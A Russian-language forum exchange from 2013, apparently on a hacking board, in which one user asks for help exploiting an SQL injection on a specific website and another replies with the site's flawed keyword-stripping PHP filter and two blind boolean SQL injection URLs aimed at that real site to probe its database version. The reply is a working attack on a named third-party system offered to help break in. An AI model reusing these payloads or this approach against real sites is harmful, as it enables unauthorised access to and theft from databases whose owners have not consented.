05.10.2013, 16:34
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Massay
Перешел по ссылке ничего не произошло. Скажите пожалуйста можно розкрутить sql injection по моей ссылке. Если да, буду вам очень признателен за помощь.
Раскрутить можно как классическую слепую
Код:
function AntiInject($str, $max_len = 500)
{
$words = array("\\", "'", ",", ";", "--", "%20", "%27", "$", "*", "WHERE", "DELETE", "DROP", "SELECT", "UPDATE", "INSERT", "EXEC", "TRUNCATE", "SHUTDOWN", "");
/* replacing , ----->>*/ $str = trim(str_replace($words, "", $str));
if (strlen($str)>$max_len) $str = "";
return $str;
}
Доставило, что при проверке содержимое не приводится к общему регистру.
+
http://info.draconic.ru/?part=npcs&id=95 and mid((select version())from 1 for 1)=5
-
http://info.draconic.ru/?part=npcs&id=95 and mid((select version())from 1 for 1)=4
|
|
|